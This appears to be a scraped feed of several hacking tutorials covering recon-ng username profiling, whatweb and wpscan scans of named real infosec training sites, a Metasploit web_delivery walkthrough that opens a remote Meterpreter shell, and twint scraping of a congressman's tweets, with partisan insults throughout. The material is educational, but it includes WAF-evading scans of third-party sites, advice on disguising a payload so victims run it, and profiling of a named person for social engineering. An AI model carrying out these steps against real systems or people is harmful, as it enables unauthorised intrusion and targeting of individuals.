We can see in the screenshot above that it takes a profile name and searches for that profile name through numerous web sites for that same name.
To begin our search, we simply enter the profile we are looking for;
[recon][default] > set source occupytheweb
and then enter;
[recon][default] > run
The profiler module then searches through numerous web sites seeking matches of this profile name. In this case, it found 9 matches! It should be pointed out these may not all be the same person, but simply the same profile name.
In my earlier tutorial on finding information on Twitter using twint, we searched the tweets of the smarmy second-term U.S. congressman from Florida, Matt Gaetz. Let's try a similar search for the sycophantic Mr. Gaetz with profiler and see whether he has other accounts under his same twitter profile, mattgaetz.
Let's set the source to "mattgaetz".
[recon][default] > set source mattgaetz
Then, enter "run".
[recon][default] >run
Within seconds, recon-ng returns numerous accounts using this same profile.
Next, of course, we can go to those accounts to find more information on the target of our recon.
When we go to account of Matt Gaetz on flickr (flickr.com/photos/mattgaetz) we see photos of Mr. Gaetz impersonating a public servant for his 0 followers.
Summary
recon-ng is an excellent tool for automating the extraction of the cornucopia of information and intelligence from the web. In this case, we used the profiler module to look for the use of the same profile in numerous websites. This can be an effective way to find accounts where the target may reveal additional information about themselves that can be useful in social engineering attacks and forensic investigations.
For more on recon-ng, check out the tutorial on determining the anti-virus of the target using recon-ng here.
  • Show original
  • .
  • Share
  • .
  • Favorite
  • .
  • Email
  • .
  • Add Tags 
Welcome back, my aspiring cyber warriors!
Web sites are built using a variety of technologies (see Web Technologies here). In most cases, before we develop a hacking strategy of the web site, we need to understand the technologies employed in building the website. Web site attacks are not generic. Attacks against WordPress-based web sites won't work against .NET based websites, for instance. We need to do this type of reconnaissance first before progressing to compromise.
In previous tutorials in this Web App Hacking series, we have used OWASP-ZAP and wpscan for vulnerability scanning. wpscan and some other specialized vulnerability scanners require that we first identify the targets technologies or CMS. In this article, we will use the tool whatweb to identify what technologies the web site developers employed in building the site.
Whatweb is a Python script that probes the website for signatures of the server, the CMS and other technologies used to develop the site. According to their web page;
WhatWeb recognises web technologies including content management systems (CMS), blogging platforms, statistic/analytics packages, JavaScript libraries, web servers, and embedded devices. WhatWeb has over 1700 plugins, each to recognise something different. WhatWeb also identifies version numbers, email addresses, account IDs, web framework modules, SQL errors, and more.
Once we know what technologies the web site is running, we can run vulnerability scans to find known vulnerabilities and develop an attack strategy.
Step #1: Fire Up Kali
The first step, of course, is to fire up Kali and open a terminal. Whatweb is built into Kali, so no need to download and install anything.
Step #2: Start Whatweb's Help
To start, let's take a look at whatweb's help screen.
kali > whatweb -h
Whatweb displays several pages of help. We can see in this first screen that the basic syntax to use whatweb is;
whatweb [options] <URL>
You will also notice in this first section a paragraph titled "Aggression". Here we can select how stealthy we want to be in probing the site. The more aggressive the scan, the more accurate it is and the more likely your scan will be detected.
When we scroll to the bottom of the help screen, we can see some examples. In most cases, we can simply enter the command, whatweb, followed by the URL of the target site.
Step #3: Scan Web Sites
Let's try scanning some web sites of companies that provide information security (infosec) training. Let's find out if they are actually securing their sites as they teach in their courses.
Let's begin by scanning sans.org.
kali > whatweb sans.org
When we scan sans.org, we can see that they have hidden their country, use Apache as their web server and an Incapsula Web Application Firewall (WAF). Minimal information, so they have done well.
Next, let's try the same scan on another infosec training site, www.infosecinstitute.com.
kali > whatweb infosecinstitute.com
When we scan www.infosecinstitute.com, we find a bit more information such as their country (United States), their web server (nginx) and their CMS (WordPress).
Next, let scan the infosec training site cybrary.it
kali > whatweb cybrary.it
A we can see, cybrary.it's server is in the U.S., they are using Amazon Web Services (AWS), Amazon's Content Delivery System (CDS), Cloudfront, and the CMS WordPress.
Step #4: Vulnerability Scan
Now that we have determined the technologies used in these sites, we can look for known vulnerabilities. The last two sites, infosecinstitute.com and cybrary.it, both use the WordPress CMS. As a result, we can use the best vulnerability scanner for WordPress sites , wpscan (for more on how to use wpscan click here).
Let's test infosecinstitute.com for vulnerabilities first.
kali > wpscan --url https://www.infosecinstitute.com
As we can see above, wpscan detected the server, the backend and the plugins for this WordPress website, but did not identify any known vulnerabilities. Great job Infosecinstitute!
You practice what you preach/teach on web security!
Next, let's try the same scan on Cybrary.it
kali > wpscan --url https://www.cybrary.it --stealthy
Note that I used the stealthy switch in this command as cybrary.it has a WAF (Web Application Firewall) that blocks these scans. Without using the stealthy switch, the WAF will block our scan and tell us that the site doesn't use WordPress.
As you can see in the screenshot above, www.cybrary.it has 27 known vulnerabilities in its WordPress based web site!
When wpscan tested their WordPress plugins, it identified another 17 vulnerabilities! Overall, the CybraryIT website had 42 known vulnerabilities on its site. That is nothing less than professional negligence!
How can anyone take seriously an information security training company who doesn't even know how to secure their own web site?
I have to wonder why they haven't been hacked yet? Or maybe they have and don't know it?
Summary
Before developing a hacking strategy of a website, we need to do some reconnaissance. Some of the key information we are looking for includes;
1. the server,
2. the CMS,
3. the web server,
4. languages,
5. any email addresses
Whatweb can provide most of this information for most web sites. Only after determining technologies employed can we begin to develop a strategy for compromising the site. In some cases, we can scan for vulnerabilities of the known technologies for known vulnerabilities. In this case above, we determined that two of the websites used WordPress as their CMS and by using the excellent vulnerability scanner, wpscan, we found one web site that practiced what they preached in web site security (infosecinstitute.com) and another that did not (Cybrary).
The developers responsible for the Cybrary website and the management that hired them should all be held responsible for professional negligence for not patching 42 known vulnerabilities.
  • Show original
  • .
  • Share
  • .
  • Favorite
  • .
  • Email
  • .
  • Add Tags 
Welcome back, my aspiring cyber warriors!
Metasploit, one of my favorite hacking/pentesting tools, has so many capabilities that even after my many tutorials on it, I have only scratched the surface of it capabilities. For instance, it can be used with Nexpose for vulnerability scanning, with nmap for port scanning, and with its numerous auxiliary modules, nearly unlimited other hacking-related capabilities.
Among the exploit modules, a category that we have not addressed are the web delivery exploits. These exploits enable us to open a web server on the attack system and then generate a simple script command that, when executed on the victim system, will open a Meterpreter shell on the target. This web delivery exploit can use Python, PHP, or the Windows PowerShell scripts.
Of course, it is your job to get the script on the target machine. This means that you will likely need to get physical access to the system or envelope the code into a seemingly innocuous-looking object that the victim will be enticed to execute.
In this tutorial, we will exploit a Linux or Mac system. Since both are UNIX-like systems, they both have built-in Python interpreters by default. If we can get the script command generated by this exploit on the target, we can have complete control of the system including keystroke logging, turning on the webcam, recording from the microphone, and reading or deleting any files on the system.
Let's get started.
Step 1: Open a Terminal
The first step, of course, is to fire up Kali and open a terminal.
Step 2: Start Metasploit & Load the Exploit
Next, start Metasploit by typing:
kali > msfconsole
This should open the msfconsole like that below.
Then we need to load the exploit:
msf > use exploit/multi/script/web_delivery
Set the IP of our attack system:
msf > set LHOST 192.168.181.153
And set the port we want to use:
msf > set LPORT 4444
Of course, I am using my private IP address in my lab, but if the target is outside your LAN, you will likely need to use your public IP and then port forward.
Step 3: Show Options
Now that we have the exploit loaded and ready to go, let's take a look at the options for this exploit. Type:
msf > show options
It looks like we have all the options set as we need. Now, let's get a bit more information on this exploit before we proceed. Type:
msf > info
As you can read above, this exploit starts a web server on our attack system and, when the command that is generated is executed on the target system, a payload is downloaded to victim. In addition, this attack does not write to disk, so it should not trigger the antivirus software on the victim's system.
Step 4: Start the Exploit
Our next step is to run the exploit. This starts the web server on our attack system and also generates a Python command that we can use to connect to this web server. Before we do that, though, we need to set the target to 0, selecting the Python exploit.
msf > set target 0
Now, we can type exploit:
msf > exploit
Notice the last thing this exploit writes is "Run the following command on the target machine" followed by the command we need to use. Copy this command.
Step 5: Run the Command on the Victim System
Next, take that command to the victim machine. In this case, I'm using an Ubuntu 14.04 system. You will need to precede the command with sudo as it requires root privileges.
Then hit Enter. When you return to your Kali system, you can see a meterpreter has been started on the target system! We own that box!
Initially, the Meterpreter is running in the background. To bring it to the foreground, we can type:
msf > sessions -l
This then brings the Meterpreter session to the foreground and we get the meterpreter prompt!
To control the system, we can run the Meterpreter commands or scripts, although most of the scripts are written for Windows systems.
  • Show original
  • .
  • Share
  • .
  • Favorite
  • .
  • Email
  • .
  • Add Tags 
The Internet is the largest treasure trove of data in the history of humankind! This repository of data is so large that companies and scientists are straining to understand and manage its scale.
We can mine that data with many different tools and sources. When that data is combined with data from multiple sources, a clear and valuable data set and insight can be garnered. This data can be prove very useful in a forensic investigation or in reconnaissance of target.
One source of an immense amount of data is the social networking site Twitter. Millions of people send out tweets daily including politicians, business people, celebrities and the U.S. President. Significant information and insights can be harvested from these tweets.
Recently, a new open source tool was developed to scrape information from this platform anonymously named twint. It is capable of scraping data from Twitter without using the Twitter API or even having an account with Twitter.
Let's take a look at how this tool works.
Step #1 Download and Install
The first step is to download this tool from github.com and its dependencies.
kali > git clone https://github.com/twintproject/twint.git
Once we have the code, we need to download its requirements.
kali > cd twint
kali > pip3 install -r requirements.txt
Now that we have installed twint in our system, let's take a look at its syntax.
Twint's syntax is rather simple.
twint -u <username> <options>
Options include;
--following
--followers
--favorites
-s <search string>
--year <limit search to a particular year>
-o <output> <file.txt or file.csv>
--database <sqllite database name>
Step #2 Gathering Info on a target
Let's try using this tool to gather some intelligence on the smarmy, second term congressman from Florida, Matt Gaetz. Gaetz is known for, among other things, his support for Holocaust deniers, white nationalism and being a Trump sycophant.
If we wanted to scrape all of the Twitter accounts Matt Gaetz is following and output them to a file name "gaetzfollowing" in a csv format, we could enter;
kali > twint -u mattgaetz --following -o gaetzfollowing --csv
As you can see, this tool outputs every account Matt Gaetz is following to the screen and into a .csv file gaetzfollowing.
We could also harvest his followers by entering;
kali > twint -u mattgaetz --followers -o gaetzfollowers --csv
If we want to see if the word "trump" appeared in Matt Gaetz's tweets, we could use the -s switch with the word trump.
kali > twint -u mattgaetz -s trump
Now we can see all of Rep. Gaetz's tweet regarding Trump including;
"I love @realdonaltrump "
on April 4, 2019.
We now have every tweet from Mr. Gaetz where he mentions "trump".
If we scroll down a bit, we can see that Mr. Gaetz didn't always love trump. On April 17, 2011 he tweets;
@realdonaldtrump is running for Pres??? Now I know how #Democrats feel every time @alsharpton runs #isthisreal
Apparently, Mr. Gaetz was equating Donald Trump and Rev. Al Sharpton in 2011. I don't think this was meant as a flattering comparison.
By the time you read this, Mr. Gaetz will likely have deleted that old Twtiter post, but we will have preserved it for all posterity.
Step #3: Scrape the Tweets and save to a Database
Often, we will want to harvest these tweets and then preserve and search them in a database. Database searches an be ore effective, faster and have the capability of linking to other databases and tables for cross referencing.
Let's scrape all Matt Gaetz's tweets and put them in a database name mattgaetzDB.
kali > twint -u mattgaetz --database mattgaetzDB
As you can see, twint will now grab every tweet from our friend, Matt Gaetz.
Now, that we have all the tweets from Mr. Gaetz, we can open then with the sqllite database browser built into Kali. Simply go to File--> Open and select the mattgaetzDB file.
It should look like this.
We can see that there are 8 tables in our database.
Let's focus on his tweets rather the other information. When we expand the "tweets" table we can see all the fields in this table.
Let's now move to the tab to the far right (how appropriate) labelled "Execute SQL".
Here we can create SQL queries to search this data. Let's search for every tweet where Mr. Gaetz mentions his friend 'trump".
To construct this query, we can enter;
SELECT tweet
FROM tweets
WHERE tweet LIKE '%trump%
When we execute this query by clicking the blue |>, we can see the results in the lower window.
Summary
Twitter, in particular, and open source intelligence, in general, can be an incredible tool to harvest all the data available to us on the web. Twint is a great tool, in combination with sqlite, for harvesting and analyzing data available to us through Twitter anonymously and without ever opening a data account.

Read for later

Articles marked as Favorite are saved for later viewing.
close
  • Show original
  • .
  • Share
  • .
  • Favorite
  • .
  • Email
  • .
  • Add Tags 

Separate tags by commas
To access this feature, please upgrade your account.
Start your free month
Free Preview